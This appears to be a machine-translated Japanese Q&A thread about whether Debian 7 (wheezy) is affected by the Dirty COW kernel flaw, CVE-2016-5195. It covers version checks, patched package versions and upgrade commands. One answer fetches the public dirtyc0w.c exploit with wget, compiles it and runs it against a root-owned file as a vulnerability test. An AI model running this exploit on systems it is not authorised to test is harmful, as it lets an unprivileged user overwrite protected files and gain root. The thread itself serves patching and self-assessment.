Linuxオペレーティングシステムの次のバージョンを実行しています。
Distributor ID: Debian
Description: Debian GNU/Linux 7.2 (wheezy)
Release: 7.2
Codename: wheezy
このバージョンが CVE-2016-5195 の影響を受けるかどうかはわかりません
誰かが私の疑問を解決するのを手伝ってくれる?
Update:AliCelebiによって言及されたコマンドを実行した後、次のようになります
3.2.28-cerberhost-0.6-modules-grsec
できるよ uname -rv
Linuxカーネルのバージョンを確認します。以下のような出力が得られます。
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
お使いのバージョンが次のバージョンよりも古い場合、影響を受けます。
Ubuntu 16.10の場合は4.8.0-26.28
Ubuntu 16.04 LTSの場合は4.4.0-45.66
Ubuntu 14.04 LTSの場合は3.13.0-100.147
3.2.0-113.155(Ubuntu 12.04 LTSの場合)
Debian 8の場合は3.16.36-1 + deb8u2
3.2.82-1 for Debian 7
4.7.8-1(Debian不安定版)
security-tracker.debian によると、uname -a
を実行して現在のカーネルバージョンを確認する必要があります。
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
この脆弱性は、システムをアップグレードすることにより、debianでパッチされています。
apt-get update
apt-get upgrade
apt-get dist-upgrade
編集
オペレーティングシステムがCVE-2016-5195の影響を受けないようにするにはどうすればよいですか?
あなたは以下を試すことができます tutorial。
エクスプロイトをダウンロードします。
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Rootとして:foo
ファイルを作成します。
su
echo this is not a test > foo
ユーザーとして:
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
ファイルを確認します。
cat foo
脆弱なマシンでは、出力としてm00000000000000000
が表示されます。